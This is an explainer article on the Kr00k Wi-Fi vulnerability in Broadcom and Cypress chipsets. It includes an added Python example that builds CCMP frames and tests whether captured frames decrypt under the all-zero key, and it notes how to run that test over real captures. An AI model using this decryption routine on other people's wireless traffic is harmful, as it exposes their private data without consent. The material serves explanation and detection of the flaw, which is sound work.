At the RSA 2020 conference, ESET, a Slovak internet security company, presented the new Kr00k vulnerability (CVE-2019-15126). The flaw lets an attacker decrypt wireless network packets transmitted by a vulnerable device. It affects WPA2-Personal and WPA2-Enterprise networks that use AES-CCMP encryption.
Kr00k vulnerability detailed:
According to the analysts, devices that use Wi-Fi chipsets from Broadcom and Cypress Semiconductor are vulnerable to this issue. The researchers tested and confirmed the problem in laptops, smartphones, routers, and IoT devices. In total, more than a billion devices are estimated to be exposed to this flaw.
The Kr00k vulnerability comes down to the encryption used to protect data packets transmitted over Wi-Fi. Normally such packets are encrypted with a unique session key (the temporal key), which is derived from the Wi-Fi password set by the user. On Broadcom and Cypress chips, however, this key is reset to all zeros when the device is disassociated from the access point, a temporary disconnection that can also happen on its own because of a weak signal. Packets still queued in the chip's transmit buffer at that moment are sent out encrypted with the all-zero key, so Kr00k opens a gap through which confidential user data can leak.
According to ESET, an attacker can deliberately trigger this disassociation (repeatedly, if needed) and capture the Wi-Fi packets the device transmits while disconnected. Exploiting the Kr00k bug, the attacker then decrypts that traffic with the all-zero key, without ever knowing the network password. ESET also notes that Kr00k is in many ways similar to the well-known KRACK vulnerability discovered in 2017.
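The following is an added example, not ESET's code or any released proof of concept. It builds two CCMP-protected 802.11 data frames with the `cryptography` library: one encrypted under a normal temporal key and one encrypted under the all-zero key, as a vulnerable chip would do for frames flushed after disassociation. The check that matters in practice is then applied to both: try to decrypt a captured frame with a 16-byte zero key and see whether the CCMP MIC verifies. If it does, the frame was encrypted with the zeroed key and its payload is readable by anyone in range. The MAC addresses, the session key and the HTTP payload are constructed for the example; the frames are plain (non-QoS) data frames so the CCMP nonce priority byte is zero.

```python
"""Kr00k-style zero-key check over CCMP frames (constructed example, not ESET's code)."""
from typing import Optional

from cryptography.exceptions import InvalidTag
from cryptography.hazmat.primitives.ciphers.aead import AESCCM

MIC_LEN = 8                 # CCMP MIC is 8 bytes
ZERO_TK = bytes(16)         # the all-zero temporal key a vulnerable chip falls back to

# Constructed addresses for the example (not taken from any capture).
AP_BSSID = bytes.fromhex("02aabbccdd01")
STA_ADDR = bytes.fromhex("02aabbccdd02")
DST_ADDR = bytes.fromhex("02aabbccdd03")


def mac_header(addr1: bytes, addr2: bytes, addr3: bytes, seq: int) -> bytes:
    """24-byte 802.11 Data header: FC, Duration, A1, A2, A3, SeqCtrl (little-endian)."""
    fc = bytes([0x08, 0x41])                       # type=Data, subtype=0; ToDS=1, Protected=1
    duration = b"\x00\x00"
    seq_ctrl = (seq << 4).to_bytes(2, "little")    # fragment number 0
    return fc + duration + addr1 + addr2 + addr3 + seq_ctrl


def ccmp_aad(header: bytes) -> bytes:
    """AAD per IEEE 802.11 CCMP: masked FC, A1, A2, A3, masked SeqCtrl."""
    fc0 = header[0] & 0x8F                         # clear subtype bits 4-6
    fc1 = (header[1] & 0xC7) | 0x40                # clear Retry/PwrMgt/MoreData, force Protected=1
    sc0 = header[22] & 0x0F                        # keep fragment number, drop sequence number
    return bytes([fc0, fc1]) + header[4:22] + bytes([sc0, 0x00])


def ccmp_nonce(header: bytes, pn: int) -> bytes:
    """13-byte CCM nonce: priority byte (0 for non-QoS) || A2 (transmitter) || 48-bit PN."""
    return b"\x00" + header[10:16] + pn.to_bytes(6, "big")


def ccmp_header(pn: int, key_id: int = 0) -> bytes:
    """8-byte CCMP header: PN0 PN1 Rsvd KeyID|ExtIV PN2 PN3 PN4 PN5."""
    p = pn.to_bytes(6, "big")
    return bytes([p[5], p[4], 0x00, 0x20 | (key_id << 6), p[3], p[2], p[1], p[0]])


def pn_from_ccmp_header(h: bytes) -> int:
    """Recover the 48-bit packet number from a CCMP header."""
    return int.from_bytes(bytes([h[7], h[6], h[5], h[4], h[1], h[0]]), "big")


def encrypt_frame(tk: bytes, header: bytes, pn: int, payload: bytes) -> bytes:
    """Protect `payload` the way a CCMP transmitter does under temporal key `tk`."""
    body = AESCCM(tk, tag_length=MIC_LEN).encrypt(ccmp_nonce(header, pn), payload, ccmp_aad(header))
    return header + ccmp_header(pn) + body       # body = ciphertext || MIC


def decrypt_frame(tk: bytes, frame: bytes) -> Optional[bytes]:
    """Return the plaintext if the MIC verifies under `tk`, else None."""
    header, ccmp_hdr, body = frame[:24], frame[24:32], frame[32:]
    pn = pn_from_ccmp_header(ccmp_hdr)
    try:
        return AESCCM(tk, tag_length=MIC_LEN).decrypt(ccmp_nonce(header, pn), body, ccmp_aad(header))
    except InvalidTag:
        return None


def leaks_under_zero_key(frame: bytes) -> bool:
    """Kr00k check: a frame that authenticates under the all-zero TK was encrypted with it."""
    return decrypt_frame(ZERO_TK, frame) is not None


def demo() -> dict:
    tk = bytes.fromhex("00112233445566778899aabbccddeeff")   # constructed session key
    hdr = mac_header(AP_BSSID, STA_ADDR, DST_ADDR, seq=7)
    payload = b"GET /login?user=alice HTTP/1.1\r\n"          # constructed plaintext

    normal = encrypt_frame(tk, hdr, pn=0x1234, payload=payload)
    # After disassociation the chip zeroes the TK but still flushes buffered frames:
    kr00k = encrypt_frame(ZERO_TK, hdr, pn=0x1235, payload=payload)

    return {
        "normal_leaks": leaks_under_zero_key(normal),        # MIC fails under the zero key
        "kr00k_leaks": leaks_under_zero_key(kr00k),          # attacker decrypts without tk
        "kr00k_plaintext": decrypt_frame(ZERO_TK, kr00k),
        "normal_plaintext": decrypt_frame(tk, normal),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(name, value)
```

Run against a real capture, `leaks_under_zero_key` is the whole test: strip the radiotap header, hand each protected data frame to `decrypt_frame(ZERO_TK, ...)`, and any frame whose MIC verifies was sent by a chip in the vulnerable state. Because the check relies on the MIC rather than on guessing at the plaintext, it produces no false positives on frames protected by a real key. QoS data frames would additionally need the QoS Control field in the AAD and its priority in the nonce, which this example omits.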
Kr00k only affects Wi-Fi connections using WPA2-Personal or WPA2-Enterprise with AES-CCMP encryption, so switching a vulnerable device to WPA3 should protect against the attacks the researchers describe. The vulnerability is also unlikely to be useful to botnet operators for automated attacks, since the attacker has to be physically close to the victim, within range of the Wi-Fi network.